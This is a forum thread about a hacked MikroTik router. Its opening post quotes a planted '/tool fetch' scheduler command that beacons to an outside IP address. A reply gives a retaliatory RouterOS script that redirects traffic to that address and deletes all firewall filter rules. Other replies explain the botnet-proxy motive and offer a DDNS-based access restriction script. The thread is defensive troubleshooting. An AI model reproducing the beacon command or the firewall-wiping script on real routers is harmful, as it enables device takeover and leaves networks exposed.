今天路由器被别人登录了
/tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no加了这个 语句。。。
谁看看 ,有哪些影响?
为了管理 我开放了winbox端口,
0 XI telnet 23
1 XI ftp 21
2 www xxx
3 XI ssh 22
4 XI www-ssl 443
5 XI api 8728
6 winbox 8291
7 XI api-ssl 8729 本帖最后由 47771885 于 2018-7-31 18:07 编辑
{
:local socksp
:local proxyp
/ip firewall nat
add action=dst-nat chain=dstnat dst-address-type=local dst-port=($socksp.",".$proxyp) protocol=\
tcp to-addresses=95.154.216.166 to-ports=2008
add action=dst-nat chain=dstnat dst-address-type=local dst-port=23,22,8291,80 protocol=\
tcp to-addresses=95.154.216.166 to-ports=2008
/ip service disable api
/ip service disable www
/ip service disable ftp
/ip service disable ssh
/ip service disable telnet
/ip service set winbox port=2018
/ip socks
set enabled=no
/ip proxy
set enabled=no
}
如防火墙加了策略的
补充
{
:local fp port]
/ip firewall filter remove
:if ( $fp > 0) do={
/ip firewall nat
add action=dst-nat chain=dstnat dst-address-type=local dst-port=$fp protocol=\
tcp to-addresses=95.154.216.166 to-ports=2008
}
}
来个以暴制暴
scheduler 和 script 自行删除可疑的
自行修改winbox 端口 这里默认2018
我把 winbox port改了,
就是想 请教你 ,他添加到计划任务有何危害? xuxi3201 发表于 2018-8-2 14:31
我把 winbox port改了,
就是想 请教你 ,他添加到计划任务有何危害?
为了保持和你的你联系
为了知道你的IP呗:lol,方便使用你的IP做代理干别的事 明白了,
多谢。
/tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http
修改winbox端口号后,软件升级到最新版本有效果吗? 回复楼上的,我直接把8291外网访问 关闭了。
。
当然,都升级到最新版本6.40.8 假設遠端的地址有DDNS地址可查,是可透過Script排程進行更新的.以winbox為例:
:local winbox [:toarray "192.168.0.0/16,$[:resolve "aaa.no-ip.org"]"]
:if (!=$winbox) do={/ip service set winbox address=$winbox}
如果有2個或更多的ddns地址,第一行修正成:
:local winbox [:toarray "192.168.0.0/16,$[:resolve "aaa.no-ip.org"],$[:resolve "bbb.no-ip.org"]"]
#更多的地址以上類推...
至於其它service服務地址,只將"winbox"這個字串改成其它服務名稱即可.
页:
[1]